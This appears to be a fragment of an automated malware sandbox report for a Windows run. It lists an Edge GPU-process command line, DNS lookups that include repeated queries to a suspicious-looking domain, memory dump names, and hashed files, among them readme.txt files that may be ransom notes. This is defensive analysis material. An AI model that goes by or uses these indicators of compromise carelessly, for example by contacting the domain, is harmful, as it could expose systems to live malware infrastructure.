"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5320 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 78800e98f0cc24503uahnpdvb.iecard.top udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 78800e98f0cc24503uahnpdvb.iecard.top udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 78800e98f0cc24503uahnpdvb.iecard.top udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 78800e98f0cc24503uahnpdvb.iecard.top udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp

Files

memory/4028-11-0x000001F2E00A0000-0x000001F2E00A1000-memory.dmp

memory/2648-12-0x0000019B8DFA0000-0x0000019B8DFA5000-memory.dmp

memory/4028-10-0x000001F2DFFE0000-0x000001F2DFFE1000-memory.dmp

memory/4028-9-0x000001F2DFFC0000-0x000001F2DFFC1000-memory.dmp

memory/4028-8-0x000001F2DFFB0000-0x000001F2DFFB1000-memory.dmp

memory/4028-7-0x000001F2DFF70000-0x000001F2DFF71000-memory.dmp

memory/4028-6-0x000001F2DFF60000-0x000001F2DFF61000-memory.dmp

memory/4028-5-0x000001F2DFF50000-0x000001F2DFF51000-memory.dmp

memory/4028-4-0x000001F2DFF40000-0x000001F2DFF41000-memory.dmp

memory/4028-3-0x000001F2DFF30000-0x000001F2DFF31000-memory.dmp

memory/4028-2-0x000001F2DFF20000-0x000001F2DFF21000-memory.dmp

memory/4028-1-0x000001F2DFF10000-0x000001F2DFF11000-memory.dmp

memory/4028-0-0x000001F2DF890000-0x000001F2DFF0C000-memory.dmp

C:\Users\Admin\Pictures\readme.txt

MD5 ed83fb90070a02af8dddffec265f4d66
SHA1 8ef80b7e9d48beed888ef04514795d6f2155096b
SHA256 1a9d3fabaa696272de7119564173e7e363249b2a60330df730ae72ca732ccf14
SHA512 59a0a939da0e99766d55d4390c9f91f98c02a9be55c803b0ad983480795a0e6b3b203ccec71ae8d69172bb0f550694ddf27f3966cb2a1f01fa47b70136e40bd7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 443a627d539ca4eab732bad0cbe7332b
SHA1 86b18b906a1acd2a22f4b2c78ac3564c394a9569
SHA256 1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9
SHA512 923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

\??\pipe\LOCAL\crashpad_4268_VNHZJZMHJIJVMFAE

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 99afa4934d1e3c56bbce114b356e8a99
SHA1 3f0e7a1a28d9d9c06b6663df5d83a65c84d52581
SHA256 08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8
SHA512 76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9d8c42c5f7758f38aca6b50691892054
SHA1 5ceb2fe81c9b4050dfe34aa20293aeda68d1b962
SHA256 59e2bb03aa6a9267c0d43c00ace7debc0336a5c9a71fdb8f94ef902a2a3a9b37
SHA512 3bef33aa8bf9e4046ecfca7aba9fda5fb8505a8a6afec5f53baaf373f1bab3e4d52e17ee3497ed6e9bb751f75e486671312d40471564821bec4f5ed22d178449

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

MD5 6db4b9f5a70363d15c7e73c157d243bb
SHA1 00063db1063c4ee278b11d03fc4ab97a539164d2
SHA256 bc8d60b89ee934f52bb08d510f92bd94807171d0a9923b260e2e11dcedb9b417
SHA512 3c328b3092686eca79703b9ac5b7c39608d8d332cdf1becdb7d7c61fa5599667c8c730435d8e4573c649b352e8ddeed544e91194c1e495c5503117d1ea91a0f6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

MD5 d5c577318fbe09353e29bf9e91247d04
SHA1 b7638cc2bdbdecf346c4a6bc93463681b089cfa7
SHA256 bad292239f517e5886e989f2ec372ea5389999d63bc89441211c8c2d064857db
SHA512 d7ce5116cf1f09e3ff574865a081fa7cea50096194687e15342e0d6d4623e44946be9fa0ef6bf185917f2925951fd4f29095e92d8dc221fd79bfbbf1ba526a09

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133779325036628517.txt

MD5 7cf0313b51ef4d9c63deb4e59ed77b9d
SHA1 41f8cf89cdf15dce7b58235cb069a5310806b9b1
SHA256 cb4eb4420c84c51cc72384a7334593489ef20c3cbe0053ec80fbc4044c76145c
SHA512 b31fa0b0821e1615b90688f7a2953145f575664e99867aca81fa5722bcdee209f9ea10406602a973acbe1aa2e6bd2a5a072792ad61f8a976fbf05928f6c2bc2b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

MD5 8012bced2de58f7dd21f9721bdf770a5
SHA1 34599dcf0e630abdbae78f5c1e661d9df8587590
SHA256 9f1d05bcc0c8ac94ccadf1cc3e41706ae6b177e9c2d7abb18f7d24b10671f404
SHA512 b242fbe26bc01c9bac318e8a860fad0d229c0d06e11468a95b0658d74faa42cfee9074878e0f73953e565c608109115c35272c5be7d678a0f7dd3e87497b0641

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 78f4a425e7ed7029d88029297a834d30
SHA1 4eb5b888162eab4acf954b40c20f2560877dea8c
SHA256 aac9621a996a202911a5002f3e29dbc1600b795bac6194eed0d6eb1a4ddb022a
SHA512 a620bf1712462025e36aaeb7a9d8793256f84d06a335d04a0dfdd9caf7b1d4d713d7841055a0fac9ebb660455eaaccaa8cba3e799a46bc7c787603eb7a35c7aa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f08585d634e1da6c769a2f9a8fdf0dcf
SHA1 8ff3f49fdc416ff76b8174906359941fa1a7a097
SHA256 0285ecb936e8b08313a1b01cf2db1385da1958d0f92bbc59699fecda5c43eaa7
SHA512 5b36caafa54ea0d3ee8cad26c58b4080331a23bc61969a30c91e38bdb66444632573ddd96d71c86542b3d49736793d024db1483eeb84c4be3248b0b746f09c62

C:\Users\Public\readme.txt

MD5 718777534403cdcf89b5d9b5f4b2f141
SHA1 3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29
SHA256 619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb
SHA512 8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

memory/3844-431-0x00000265FCFB0000-0x00000265FCFB8000-memory.dmp

memory/3844-432-0x00000265FCE60000-0x00000265FCE61000-memory.dmp